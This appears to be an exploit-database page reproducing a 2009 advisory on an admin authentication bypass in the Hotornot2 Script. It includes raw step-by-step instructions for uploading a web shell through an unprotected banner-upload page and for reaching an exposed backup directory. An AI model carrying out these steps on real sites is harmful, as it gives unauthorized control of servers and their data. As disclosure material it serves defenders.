header-logo
Suggest Exploit
vendor:
Hotornot2 Script
by:
sniper code
3,3
CVSS
MEDIUM
Admin Bypass
287
CWE
Product Name: Hotornot2 Script
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Hotornot2 Script (Remote apload) Admin Bypass Vulnerability

A vulnerability exists in Hotornot2 Script which allows an attacker to bypass the admin authentication and upload a malicious file. An attacker can exploit this vulnerability by going to http://localhost/[path]/admin/sitebanners/upload_banners.php and uploading a malicious file. The attacker can then view the uploaded file by going to http://localhost/[path]/banners/Shell.php. To bypass the admin backup, the attacker can go to http://localhost/[path]/admin/backup.

Mitigation:

Ensure that proper authentication is implemented for all admin pages.
Source

Exploit-DB raw data:

    [+]
     Hotornot2 Script (Remote apload) Admin Bypass Vulnerability

    ===== ++ by sniper code++============================================

    Author : sniper code  ( S.C.T-443 )
    website : www.sec-code.com
    ===================================================================================================================
    [+]
    ScRipT : http://www.ezonescripts.com/scripts/sls/hotornot2.php
    ====================================================================================================================
    [+]
    Exploit:

    GO to :
    http://localhost/[path]/admin/sitebanners/upload_banners.php ( no need to registeration)

    you will see (Upload banners)

    ( browse and select file like example : Shell.php) and press upload )
    you can press View banners button to see and ensoure your file uploaded ...

    then Go to :
    http://localhost/[path]/banners/Shell.php    ( will view the shell )

    [+]
    for bypassing admin backup :
    Go to :
    http://localhost/[path]/admin/backup

    dork : use ur mind ^_^

    Thats it . . .
                            
    ===================================================================================================================
    [+] Greetz to :

           [»] MN9 - AL-H7ano0ty - AB0 3thaB -snake1095 - rxh
           [»] JiKo, Crackerz child...
           [=]all members of tryag.cc + sec-code.com

    ===================================================================================================================

# milw0rm.com [2009-05-26]

Navigation

Suggest Exploit

Services By CQR